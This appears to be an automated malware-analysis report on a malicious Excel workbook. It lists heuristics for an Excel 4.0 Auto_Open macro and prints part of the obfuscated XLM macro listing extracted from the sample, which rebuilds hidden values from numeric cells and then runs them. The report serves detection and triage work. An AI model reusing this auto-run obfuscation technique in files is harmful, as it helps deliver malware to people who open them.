MALICIOUS
Risk Score: 140
Heuristics 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6875 bytes |

SHA-256: e3d126db4e95a45c77aee2f6560eb860f972962ef4314caba047304402d72ac8

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - vzhCVBePiGG
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G170
' 0018 21 LABEL : Cell Value, String Constant - BPIpCB len=0
' 0018 27 LABEL : Cell Value, String Constant - cdNDJRYaXDli len=0
' 0018 24 LABEL : Cell Value, String Constant - CqyzBohYB len=0
' 0018 23 LABEL : Cell Value, String Constant - DjTKGQsM len=0
' 0018 22 LABEL : Cell Value, String Constant - FfmpoaR len=0
' 0018 27 LABEL : Cell Value, String Constant - hSGmrYUIcHVb len=0
' 0018 24 LABEL : Cell Value, String Constant - hsZrSYHnG len=0
' 0018 24 LABEL : Cell Value, String Constant - hXvWScvzN len=0
' 0018 26 LABEL : Cell Value, String Constant - IfNkYsYdsiW len=0
' 0018 23 LABEL : Cell Value, String Constant - jrqFVGXZ len=0
' 0018 23 LABEL : Cell Value, String Constant - lcVcmLCM len=0
' 0018 24 LABEL : Cell Value, String Constant - LppfvBleX len=0
' 0018 21 LABEL : Cell Value, String Constant - MApFaG len=0
' 0018 22 LABEL : Cell Value, String Constant - ndceqQP len=0
' 0018 26 LABEL : Cell Value, String Constant - oUPPQWndtbg len=0
' 0018 20 LABEL : Cell Value, String Constant - pYydx len=0
' 0018 24 LABEL : Cell Value, String Constant - QwoeQQmhj len=0
' 0018 27 LABEL : Cell Value, String Constant - UFviiUazvSjw len=0
' 0018 23 LABEL : Cell Value, String Constant - VIzOAXOq len=0
' 0018 20 LABEL : Cell Value, String Constant - ZPpBJ len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' vzhCVBePiGG,P47,"",-822.00000000000000000000
' vzhCVBePiGG,P48,"",-83.00000000000000000000
' vzhCVBePiGG,P49,"",-320.00000000000000000000
' vzhCVBePiGG,P50,"",-142.00000000000000000000
' vzhCVBePiGG,P51,"",-871.00000000000000000000
' vzhCVBePiGG,P52,"",388.00000000000000000000
' vzhCVBePiGG,G77,"SET.NAME("hXvWScvzN",0+VALUE("0"))",""
' vzhCVBePiGG,G82,"SET.NAME("CqyzBohYB",hXvWScvzN)",""
' vzhCVBePiGG,G84,"SET.NAME("lcVcmLCM",hXvWScvzN)",""
' vzhCVBePiGG,G88,"SET.NAME("cdNDJRYaXDli",COUNTA(IfNkYsYdsiW))",""
' vzhCVBePiGG,G93,"SET.NAME("hsZrSYHnG",COUNTA(FfmpoaR))",""
' vzhCVBePiGG,G98,[],""
' vzhCVBePiGG,G103,"SET.NAME("jrqFVGXZ","")",""
' vzhCVBePiGG,G105,"CqyzBohYB",""
' vzhCVBePiGG,G107,"SET.NAME("MApFaG",HLOOKUP("*",IfNkYsYdsiW,CqyzBohYB,FALSE))",""
' vzhCVBePiGG,G111,"UFviiUazvSjw",""
' vzhCVBePiGG,G116,"SET.NAME("LppfvBleX",hXvWScvzN)",""
' vzhCVBePiGG,G118,[],""
' vzhCVBePiGG,G120,"LppfvBleX",""
' vzhCVBePiGG,G124,"ZPpBJ",""
' vzhCVBePiGG,G126,"BPIpCB",""
' vzhCVBePiGG,G130,"DjTKGQsM",""
' vzhCVBePiGG,G133,"SET.NAME("hSGmrYUIcHVb",VALUE(HLOOKUP("*",FfmpoaR,DjTKGQsM,FALSE)))",""
' vzhCVBePiGG,G137,"oUPPQWndtbg",""
' vzhCVBePiGG,G141,"jrqFVGXZ",""
' vzhCVBePiGG,G145,"lcVcmLCM",""
' vzhCVBePiGG,G147,NEXT(),""
' vzhCVBePiGG,G151,"VIzOAXOq",""
' vzhCVBePiGG,G154,[],""
' vzhCVBePiGG,G158,"ndceqQP",""
' vzhCVBePiGG,G163,NEXT(),""
' vzhCVBePiGG,G168,RETURN(),""
' vzhCVBePiGG,G196,"SET.NAME("pYydx",G77)",""
' vzhCVBePiGG,G198,"IfNkYsYdsiW",""
' vzhCVBePiGG,G203,"SET.NAME("FfmpoaR",R65C12)",""
' vzhCVBePiGG,G207,"SET.NAME("ndceqQP",213)",""
' vzhCVBePiGG,G210,"SET.NAME("QwoeQQmhj",7)",""
' vzhCVBePiGG,G212,pYydx(),""
' vzhCVBePiGG,G213,HALT(),""